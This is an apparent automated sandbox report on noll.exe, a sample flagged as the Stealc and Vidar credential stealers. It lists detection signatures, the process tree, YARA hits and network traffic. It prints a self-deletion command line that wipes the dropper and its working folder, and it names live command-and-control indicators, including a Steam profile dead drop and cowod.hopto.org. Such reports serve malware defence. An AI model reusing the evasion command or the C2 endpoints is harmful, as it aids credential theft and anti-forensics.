Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
noll.exe

Overview

General Information

Sample name:noll.exe
Analysis ID:1577315
MD5:d78f753a16d17675fb2af71d58d479b0
SHA1:71bfc274f7c5788b67f7cfae31be255a63dcf609
SHA256:ad9c40c2644ff83e0edbc367c6e62be98c9632157433108c03379351fe7aeca5
Tags:18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Classification

  • System is w10x64
  • noll.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\noll.exe" MD5: D78F753A16D17675FB2AF71D58D479B0)
    • cmd.exe (PID: 1120 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6572 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "2ee1445fc63bc20d0e7966867b13e0e1"}
SourceRuleDescriptionAuthorStrings
noll.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    noll.exeJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      noll.exeJoeSecurity_StealcYara detected StealcJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  Click to see the 6 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.noll.exe.80000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.0.noll.exe.80000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      0.0.noll.exe.80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                        0.2.noll.exe.80000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          0.2.noll.exe.80000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                            Click to see the 1 entries
                            No Sigma rule has matched
                            No Suricata rule has matched

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: noll.exeAvira: detected
                            Source: noll.exeMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "2ee1445fc63bc20d0e7966867b13e0e1"}
                            Source: noll.exeReversingLabs: Detection: 81%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: noll.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00088048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00088048
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000880A1 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000880A1
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00091E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00091E5D
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008A7D8 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,0_2_0008A7D8
                            Source: noll.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49713 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49725 version: TLS 1.2
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008B93F
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00095B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00095B0B
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0009543D
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00094CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00094CC8
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00089D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00089D1C
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0008CD37
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00081D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00081D80
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008D5C6
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0008B5DF
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0008BF4D
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00095FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00095FD1
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00095142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00095142
                            Source: C:\Users\user\Desktop\noll.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_000814AD
                            Source: C:\Users\user\Desktop\noll.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax0_2_000814AD

                            Networking

                            barindex
                            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /ae5ed HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                            Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00086963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00086963
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /ae5ed HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                            Source: global trafficDNS traffic detected: DNS query: t.me
                            Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.=cloudflare
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.ef=
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.flare
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.org
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                            Source: noll.exeString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.orgiv
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.orglass=
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.orgre
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hoptoml
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hoptoref=
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                            Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                            Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/publi
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=THDq
                            Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
                            Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarog
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
                            Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&amp
